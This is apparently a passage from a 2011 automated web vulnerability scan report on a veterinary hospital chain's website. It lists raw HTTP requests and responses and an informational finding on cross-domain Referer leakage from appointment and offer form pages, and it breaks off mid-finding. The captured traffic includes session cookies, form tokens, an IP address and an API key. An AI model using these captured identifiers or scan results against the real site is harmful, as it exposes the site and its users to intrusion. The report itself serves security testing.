GET /marshfield/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Referer: http://www.vcahospitals.com/marshfield Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:38 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21614 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="token" id="token" value="726697e7d1d65ecce474a92fba41e028" /> <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/marshfield" /> <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/marshfield/appt.html" /> <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" /> <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" /> <input type="hidden" name="guid" id="guid" value="" /> <input type="hidden" name="source" id="source" value="marshfield" /> <input type="hidden" name="appt_type" value="appt" /> </form> <p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. 
For more information, see the <a href="http://www.vcahospitals.com/marshfield/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-8482760-2"); gwoTracker._trackPageview("/1639539707/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div><!-- .content --> <div class="nav-page"> <h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3> <div id="pictogram"><img src="http://ww...[SNIP]...
Request 2
GET /marshfield/appt.html HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:46:15 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21576 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <input type="hidden" name="token" id="token" value="0deb684bf4149527b041f1838c908e8d" /> <input type="hidden" name="referer" id="referer" value="" /> <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/marshfield/appt.html" /> <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" /> <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" /> <input type="hidden" name="guid" id="guid" value="" /> <input type="hidden" name="source" id="source" value="marshfield" /> <input type="hidden" name="appt_type" value="appt" /> </form> <p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. 
For more information, see the <a href="http://www.vcahospitals.com/marshfield/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p> <!-- Google Website Optimizer Tracking Script --> <script type="text/javascript"> if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+ (document.location.protocol=='https:'?'s://ssl':'://www')+ '.google-analytics.com/ga.js"></sc'+'ript>')</script> <script type="text/javascript"> try { var gwoTracker=_gat._getTracker("UA-8482760-2"); gwoTracker._trackPageview("/1639539707/test"); }catch(err){}</script> <!-- End of Google Website Optimizer Tracking Script --> </div><!-- .content --> <div class="nav-page"> <h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3> <div id="pictogram"><img src="http://www.vcahospitals.com/marshfield/image/ho...[SNIP]...
7. Cross-domain Referer leakage
There are 6 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
7.1. http://www.vcahospitals.com/hanson/appt.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The page was loaded from a URL containing a query string:http://www.vcahospitals.com/hanson/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bd
d4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%252
6source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d
The response contains the following links to other domains:
http://vca.unicaondemand.com/ods/js/imodTag.js
http://www.facebook.com/VCAAnimalHospitals
Request
GET /hanson/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fapp
t.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%
2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:48 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 24905 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]... <li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank"> Like us on Facebook <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />...[SNIP]...
7.2. http://www.vcahospitals.com/hanson/offer.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/offer.html
Issue detail
The page was loaded from a URL containing a query string:http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.
com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip=
The response contains the following links to other domains:
http://vca.unicaondemand.com/ods/js/imodTag.js
http://www.facebook.com/VCAAnimalHospitals
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526to
ken%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:40 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19335 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... </script> <script src="http://vca.unicaondemand.com/ods/js/imodTag.js" type="text/javascript"> </script>...[SNIP]... <li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank"> Like us on Facebook <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />...[SNIP]...
7.3. http://www.vcahospitals.com/main/directory.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/directory.html
Issue detail
The page was loaded from a URL containing a query string: http://www.vcahospitals.com/main/directory.html?utm_content=link.corp.ffe.locator.
The response contains the following links to other domains:
http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js
http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw
http://vcajobs.com/
http://www.facebook.com/VCAAnimalHospitals
http://www.petinsurance.com/affiliates/vca.aspx?ec=VH0004
http://www.vcaantech.com/
Request
GET /main/directory.html?utm_content=link.corp.ffe.locator. HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.5.10.1299326665
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:44:12 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 87236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... </script><script src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAA3yAtykvNwfZWXFMr5jaqbxQe81n6rsu4MMpbal4noyhM4BdC2xR3zat7Gh8uvXlxFvDMbMR1N9w9xw" type="text/javascript"> </script><script src="http://gmaps-utility-library.googlecode.com/svn/trunk/markermanager/release/src/markermanager.js" type="text/javascript"> </script>...[SNIP]... <li><a href="http://www.vcaantech.com/" title="VCA Antech Inc." target="_blank"> VCA Antech Inc.</a>...[SNIP]... <li><a href="http://www.petinsurance.com/affiliates/vca.aspx?ec=VH0004" title="News" target="_blank"> Pet Insurance</a>...[SNIP]... <li><a href="http://vcajobs.com" target="_blank" title="Careers"> Careers</a>...[SNIP]... <li><a href="http://www.facebook.com/VCAAnimalHospitals" target="_blank"> Like us on Facebook <img src="/img/logo-facebook-like.png" style="vertical-align:bottom;" />...[SNIP]...
7.4. http://www.vcahospitals.com/main/offer
Summary
Severity: Information
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
